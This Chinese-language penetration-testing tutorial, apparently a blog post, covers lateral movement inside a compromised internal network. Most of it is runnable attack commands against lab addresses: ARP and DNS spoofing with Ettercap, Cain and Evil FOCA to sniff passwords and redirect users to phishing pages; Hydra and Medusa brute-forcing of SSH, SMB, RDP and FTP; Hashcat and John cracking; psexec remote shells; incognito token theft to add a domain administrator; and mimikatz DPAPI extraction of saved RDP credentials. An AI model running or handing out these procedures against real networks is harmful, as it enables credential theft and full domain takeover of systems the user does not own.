橫向滲透的常見方法

在已經攻佔部分內網主機的前提下，利用現有的資源嘗試獲取更多的憑據、更高的權限，進而達到控制整個網段、擁有最高權限的目的。在很多時候，內網滲透的起點往往只是一臺通過漏洞攻陷的跳板，橫向滲透就是通過這個突破口去不斷擴大在本網段內的戰果。

進入內網維持好權限後接下來要做的就是對當前網絡信息進行全面的信息收集。分析自己所處的網絡位置、計算機信息、橫向資產、服務與埠(漏洞掃描及利用）、敏感數據(如ftp連結記錄、瀏覽器訪問記錄、各服務保存的密碼、資料庫等)。埠服務常見攻擊方法有：爆破、漏洞利用、欺騙、釣魚

根據補丁信息，掏出EXP利用常規系統漏洞對整個網段進行掃描並利用。

二、流量監聽

監聽對象是網段內未加密的一些服務協議，主要內容包括服務連接密碼、網站登錄密碼、敏感數據等

1. cain
cain適用於老版本伺服器，實例：

win2003是web伺服器，充當進入內網的跳板機(192.168.198.133） win7充當內網被攻擊機（192.168.198.130）
win2003安裝了cain。通過cain充當中間人做arp欺騙，截取靶機win7與網關通信的流量以獲取不加密的敏感信息。

①選擇網卡同時也可以修改默認埠。確認點擊即可開始嗅探

③選擇網關以及欺騙目標主機

④開始欺騙

此時在靶機裡面可以看見網關和win03的mac地址相同，說明已經完成arp欺騙


⑤開始監聽，監聽後在目標機器win7裡面打開任意http登錄框輸入密碼進行登錄：

⑥此時在cain裡面，成功抓取密碼


1.1 抓取telnet登錄密碼

靶機win7 telnet連接網段內任意設備


1.2 抓取ftp登錄密碼
靶機win7 ftp登錄網段內任意設備

抓取成功


2.wireshark
wireshark是網工必備神器，功能強大，這裡只簡單介紹到他的過濾語法進行流量監聽。

① 抓取http流量


②抓取指定源地址的http流量
http && ip.src==192.168.198.133

③抓取post數據包含用戶名及密碼
http && ip.src==192.168.198.133  && http.request.method=="POST"
抓取到的登錄信息：

④抓取訪問指定目標地址的http流量
http && ip.dst==192.168.198.133

2.1抓取ftp
ftp && ip.dst==192.168.198.133

telnet && ip.dst==192.168.198.133
抓取到的telnet是一個一個字符傳遞數據，所以根據tcp碼流將所有流量合成一個數據包進行分析(右鍵單擊數據包點擊)

三、ARP欺騙
進行arp欺騙後，可進行域名欺騙、網頁內容欺騙、dns解析欺騙+釣魚攻擊等進一步操作。

1.netfuke
和cain工具一樣只適用於老版本伺服器。
①嗅探設置

來源IP欄輸入網關地址，中間人寫本機IP。

可以將釣魚頁面以html格式文件寫到這裡


③啟動欺騙之後。在目標瀏覽器上，所有web網站都會強制跳轉到html頁面。

2. Foca evail
Foca evail適合高版本伺服器，需要dotnet 4.5以上環境。打開工具設置網卡之後會自動識別同網段其他主機和網關

①arp中間人攻擊
選擇網關及目標機器進行ipv4攻擊

②配置dns劫持欺騙
劫持dns解析過程，在主機將www.baidu.com域名發送到dns伺服器時進行劫持返回主機偽造的其他的IP位址。這裡將百度的域名解析到192.168.198.1這個IP上。（若勾選wildcard選項表示劫持所有域名）

③成功劫持
靶機上www.baidu.com已經解析到IP 192.168.198.1。利用dns劫持可以進行釣魚攻擊

3. ettercap
ettercap是kali一款功能強大的欺騙攻擊工具，既可以實現arp欺騙也可以實現複雜的中間人攻擊。支持命令行和圖形界面

arp欺騙
①ettercap -G  打開圖形界面
②掃描存活主機
accept>hosts>scan for hosts,掃描完成後依次點擊hosts>hosts list，可查看當前網絡主機列表

③選擇攻擊目標設為target 1，網關設為 target 2


④選擇中間人攻擊類型。設置arp監聽，然後開始攻擊

⑤成功抓取密碼

Dns欺騙
①設置欺騙的目標ip以及指定目標網址
vi /etc/ettercap/etter.dns

②accept>hosts>scan for hosts,掃描完成後hosts>hosts list，可查看主機列表。設置欺騙目標，開啟arp欺騙


③設置插件
plugins》manage plugins》dns_spoof


④dns欺騙
這裡也可以看到記錄的密碼
⑤dns欺騙成功

ettercap命令行
ettercap -T -q -i eth0 -M arp:remote /192.168.198.130// /192.168.198.2//#目標：192.168.198.130#網關：192.168.198.2
抓取密碼成功，這裡還能抓到cookie，如果沒法抓到密碼可以抓cookie登錄

四、服務密碼攻擊
1.在線爆破
在線爆破受網絡因素、字典、電腦性能影響較大。掃描埠分析服務進行爆破攻擊：smb、telnet、ftp、rdp、mysql、mssql、ssh

Hydra爆破telnet
hydra -L /root/dict/usename.txt -P /root/dict/password.txt -t 20 telnet://192.168.198.133:23

Hydra爆破ftp
hydra -L /root/dict/usename.txt -P /root/dict/password.txt -t 20 ftp://192.168.198.133:21
Hydra爆破smb
hydra -L /root/dict/usename.txt -P /root/dict/password.txt -t 20 smb://192.168.198.133:445

Hydra爆破ssh
hydra -L /root/dict/usename.txt -P /root/dict/password.txt -t 20 ssh://192.168.198.131:22


Hydra爆破rdp。存在誤報情況，未知原因：
hydra -L /root/dict/usename.txt -P /root/dict/password.txt -t 20 rdp://192.168.198.133:3389

medusa
medusa 工具是通過並行登錄暴力破解的方法，嘗試獲取遠程驗證服務訪問權限。medusa能夠驗證的遠程服務，如ftp/http/imap/mssql/netware/nntp/pcanywhere/pop3/snmp/sshv2/telnet/vnc 等服務密碼。個人覺得沒有hydra用起來絲滑
medusa -h 192.168.1.8 -U /root/dict/usename.txt -P /root/dict/password.txt -M telnet
其他–超級弱口令工具
線程越低越精確


2.離線爆破
得到目標密文後本地加載字典爆破。不用考慮網絡因素，對字典、電腦性能要求高

2.1 hash-identifier--用於識別密文加密的算法類型的工具

2.2 Hashcat
Hashcat系列軟體包含Hashcat、oclHashcat、oclRausscrack。其區別為Hashcat只支持cpu破解；oclHashcat和oclGausscrack則支持gpu加速。oclHashcat則分為AMD版和NIVDA版。
-m #指定加密類型，跟上對應的id號。id號對應編碼方式如下圖

-a #指定爆破攻擊模式，常用0和3。0表示加載字典爆破，3表示邊生成字典邊爆破

①字典爆破
#使用字典破解密碼,a.hash是指要爆破的密文，password.txt是指密碼字典。-o 1.txt輸出為文件hashcat /root/dict/a.hash -m 0 -a 0 /root/dict/password.txt --force


②掩碼破解

?l #小寫字母?u #大寫字母?d #純數字?h #小寫十六進位?H #大寫十六進位?s #特殊字符?a #等於?l?u?d?s#例如：生成8位純數字爆破hashcat a.txt -m 0 -a 3 ?d?d?d?d?d?d?d?d

指定爆破位數且為每一個字母指定類型
hashcat /root/dict/a.hash -m 0 -a 3 ?l?l?l?l?d?d?d --force# test123>?l?l?l?l?d?d?d


組合爆破
--custom-charset1=?l?d ?1?1?1?1?1?1?1?1# 表示生成8位(?1表示數字和小寫字母的組合)由小寫字母和數字組合形成的字典hashcat /root/dict/a.hash -m 0 -a 3 --custom-charset1=?l?d ?1?1?1?1?1?1?1?1 --force
john

1.破解windows密碼。用hashdump7或者mimikatz 導出windows hash為1.txt
john -format=NT /root/1.txt

2.破解Linux shadow文件
cat /etc/shadow > shadow.txtjohn shadow.txtjohn shadow.txt --show

壓縮包爆破
1.Fcrackzip
#安裝apt-get install fcrackzip-b   -c   -u   -l 5-6 -D   -p   -threads 

#爆破密碼為數字fcrackzip -b -ca1 -l 1-6 -u ip.zip#帶字典爆破fcrackzip -D -p pass.txt -u 1.zip

2.rarcrack
該軟體用於暴力破解壓縮文件的密碼，但僅支持RAR, ZIP, 7Z這三種類型的壓縮包
執行命令: rarcrack 文件名 -threads 線程數 -type rar|zip|7z
rarcrack 123.zip --threads 10 --type zip
如果允許出現錯誤。那麼可以執行sudo apt-get install libxml2-dev libxslt-dev進行修復。

shell控制連接
通過埠爆破445得到帳號密碼。沒有開3389沒法直接登錄，此時借用psexec直接調用cmd登錄。也可以通過incognito劫持token，如果有域管理員token劫持DC，創建一個域管理員出來

1.psexec.exe
下載地址:https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe
通過得到的帳號密碼信息連結跳板機，通過smb爆破得到帳號密碼，如果目標沒有開啟3389/23服務無法直接登錄，藉助psexec.exe工具通過smb服務調用目標cmd
psexec.exe \\192.168.198.138 -u administrator -p 123456 cmd


2.incognito.exe提權

#查看本機可以利用的tokenincognito.exe list_tokens -u  #查看遠程機器可以利用劫持的tokenincognito.exe -h 192.168.198.138 -u administrator -p 123456 list_tokens -u 

#調用遠程機器的本地系統權限的cmd.exe，查看可以劫持的權限incognito.exe -h 192.168.198.138 -u administrator -p 123456 execute -c "NT AUTHORITY\SYSTEM" cmd.exe 


#域控帳號登陸過普通主機，可以嘗試拿到域低權限帳號利用incognito工具劫持域控身份#查找被攻擊的計算機中是否有DC的tokenincognito.exe -h 192.168.200.11 -u admin -p 123123 list_tokens -u  #利用DA的token創建新的DC，調用DC的cmd.exeincognito.exe -h 192.168.200.11 -u admin -p 123123 execute -c "XY\ADMINISTRATOR" cmd.exe  #執行創建DC命令net user hh 123.com /add /domainnet group "domain admins" hh /add /domain

Linux下通過smbclient訪問windows共享目錄

1.安裝smbclient
yum -y install samba-client/apt-get install samba-client
2.查看共享
smbclient -L 192.168.1.8 -U administrator 
 
3.smb連接
smbclient //192.168.1.8/tools -U administrator
執行smbclient命令成功後，進入smbclient環境，出現提示符：smb:/>  這裡命令和ftp命令相似，如cd 、lcd、get、megt、put、mput等。通過這些命令，我們可以訪問遠程主機的共享資源

本地rdp密碼讀取

1.查看當前伺服器歷史記錄


2.查找保存在本地的認證，得到對應路徑以及值
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

得到：
C:**加粗樣式**\Users\admin\AppData\Local\Microsoft\Credentials\1F914B4D8F36DFD93C3A37B7D5491363

3.運行mimikaz，獲取guidMasterKey
mimikatz dpapi::cred /in:C:\Users\MIN\AppData\Local\Microsoft\Credentials\1F914B4D8F36DFD93C3A37B7D5491363
接下來需要使用的是guidMasterKey、pbData數據。pbData是憑據的加密數據，guidMasterKey是憑據的GUID。

4.獲取MasterKey
根據目標憑據GUID找到其關聯的MasterKey，這個MasterKey就是加密憑據的密鑰，即解密pbData所必須的東西。
mimikatz.exe ""privilege::debug"" ""sekurlsa::dpapi full"" exit >> c:\log.txt
根據guid獲取到masterkey

5.mimikatz破解密碼
dpapi::cred /in:C:\Users\admin\AppData\Local\Microsoft\Credentials\1F914B4D8F36DFD93C3A37B7D5491363/masterkey:3d5c95de7ccd3a1d468efd0d90a42330cdcf06d0e7ee834a443907384a6b25dab8d8ab32c8c9540605711d689304ecab949e168719551d2423498168f7fec6ac

一如既往的學習，一如既往的整理，一如即往的分享。感謝支持